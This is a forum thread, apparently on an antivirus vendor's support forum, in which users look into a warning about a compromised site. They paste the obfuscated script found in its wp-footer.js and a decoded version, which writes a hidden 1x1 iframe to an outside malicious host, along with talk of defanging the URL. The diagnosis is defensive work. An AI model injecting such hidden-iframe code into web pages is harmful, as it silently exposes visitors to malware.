I am getting a warning on the riverswithoutborders.org site
Sign of HTML:IFrame-IV [Trj} has been found…
Is this a false positive? I wouldn’t think this site owuld be malicious.
I am getting a warning on the riverswithoutborders.org site
Sign of HTML:IFrame-IV [Trj} has been found…
Is this a false positive? I wouldn’t think this site owuld be malicious.
I found the aller too, it said the infected part: hXXp://riverswithoutborders.org/home/wp-footer.js (A java script on the footer section).
I hope this topic gives some help: http://forum.avast.com/index.php?topic=45005.0
@jnkyrd
Please read:
Every 3.6 seconds a website is infected
http://forum.avast.com/index.php?topic=47096.0
yes wp-footer.js contains :
eval(function(p,a,c,k,e,d)
{
while(c--)
{
if(k[c])
{
p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])
}
}
return p
}
('f 4=6 5(),2=6 5(4.d()+g);
c(0.7.9("8=1")==-1)
{
0.b("<3 a=1 e=1 o=\'n://h-q.m/l/\' i=\'j:k\'></3>");
0.7="8=1;
"+" 2="+2.p()+";
"
}
',27,27,'document||expires|iframe|today|Date|new|cookie|_ubit|indexOf|width|write|if|getTime|height|var|2678400000|loading|style|display|none|b2b|net|http|src|toGMTString|nso'.split('|')))
deobfuscation results in :
var today = new Date(), expires = new Date(today.getTime() + 2678400000);
if (document.cookie.indexOf("_ubit=1") ==- 1){
document.write("
<iframe width=1 height=1 src='hxxp://loading-nso.net/b2b/' style='display:none'></iframe>"
);
document.cookie = "_ubit=1;" + " expires=" + expires.toGMTString() + "; "
}
the site is infected.
js contains eval function.
edit : see the iframe in second code.
do not quote reply #3 because the iframe in the second code triggers avast!
nmb,
It doesn’t for me The standardshield alerts when I visit this page, please modifiy it… but I wouldn’t post the full iframe…
to prevent the alert, do what I do, and post a screenshot of the alert or edit the iframe to disable it when you post it in code
This would remove the potential for an alert
-Scott-
Everything is at high…
As you can see above, I did get an alert, just not the webshield, although I don’t seem to be getting them anymore…
This is why i post pics instead of the code…
now that i have changed to hxxp, is it trigerring?.
considered! next time, i’ll post pictures. thank you.
Not sure, I was getting alerts in the sessionstore.js file until I cleared the browser cache and everything else…we’ll see for now…
yes you are rite… in sessionstore.js.